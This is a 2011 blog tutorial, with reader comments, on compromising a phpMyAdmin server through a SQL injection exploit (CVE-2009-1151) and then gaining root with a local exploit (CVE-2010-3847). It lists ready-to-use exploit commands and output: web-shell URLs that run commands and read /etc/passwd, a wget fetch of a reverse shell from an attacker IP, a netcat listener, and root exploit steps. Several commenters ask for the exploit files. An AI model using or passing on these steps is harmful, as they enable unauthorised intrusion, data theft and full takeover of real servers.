Friday, 11 February 2011

SQL Injection on phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

PHPMYADMIN SQL INJECTION
CVE: CVE-2009-1151
Remote: Yes
Local: No

ROOT
CVE-2010-3847
Remote: No
Local: Yes







0) Download the php exploit from http://securityreason.com/exploitalert/6399
    Donwload the get_root exploit from http://seclists.org/fulldisclosure/2010/Oct/257


1) Run the exploit against the target machine.
[root@bt]# ./php_exploit  http://mytargettest.com/phpMyAdmin/

[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/exploit.29597.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com

2)  Great, that means it worked, now you can type commands on the target machine.
  
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/var
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=cat+/etc/passwd
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=touch+/tmp/test
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/tmp/test ( Make sure you can write in there and the file is there.

    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell   (Download your rev_shell)

   http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=chmod+777+/tmp/airwolf_reverse_shell  (change the permissions to execute)

3) Now you have your exploit in the target machine ready to run, this exploit is just a reverse shell
   so, in my machine I run this :
   nc -l -p 8080 -vvv

4) Now I execute my reverse shell to connect to my machine
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=/tmp/airwolf_reverse_shell
  
5) Great, now you have a shell, next step is get root.
id

6) cd /tmp/ ; mkdir hack ; cd hack
   wget http://172.16.1.79/exploits/get_root
   wget http://172.16.1.79/exploits/payload.c

7) Run the exploit to get root and that's it.
chmod +x ./get_root
./get_root
id

Games over!

14 comments:

  1. Hey man, nice tutorial. I would like to get in touch with you. Do you have an email or messenger?

    ReplyDelete
  2. Sure, my email is pochackblog@gmail.com
    I will be posting here soon my ftp so everyone can download all the needed stuff from my ftp.

    ReplyDelete
  3. hey where can i get the get_root exploit from the link?..if you can upload it it somewhere i would greatly appreciate it :) thanks in advance!!!

    ReplyDelete
  4. What's that program's name? Metasploit?

    ReplyDelete
  5. Noup, its just an exploit as I said.

    ReplyDelete
  6. When I write php_exploit it says no such file or directory

    ReplyDelete
  7. You need to download the exploit first.

    ReplyDelete
    Replies
    1. Where from? There isn't a download link on that page... Do you mean you have to create a file and copy/paste the code from that link?

      Delete
  8. These facts are really interesting. Few of them were well known for me but many of them were brand new for me too!
    I will print this one out and show to my friends because they will be definitely interested in that. Thanks!
    phpMyAdmin

    ReplyDelete
  9. i`m really newbie in IT, but i wanna to study like this, couse in my country i dnt have it...dont you wanna give me step by step this tutorial? please email me at rvirgian1@gmail.com

    ReplyDelete
  10. thanks indeed,
    I can't find the right link to download the exploit, would you please give to me.
    N.P the 1st link has been changed to http://cxsecurity.com/exploit
    thanks

    ReplyDelete
  11. i dont really get how to download it

    ReplyDelete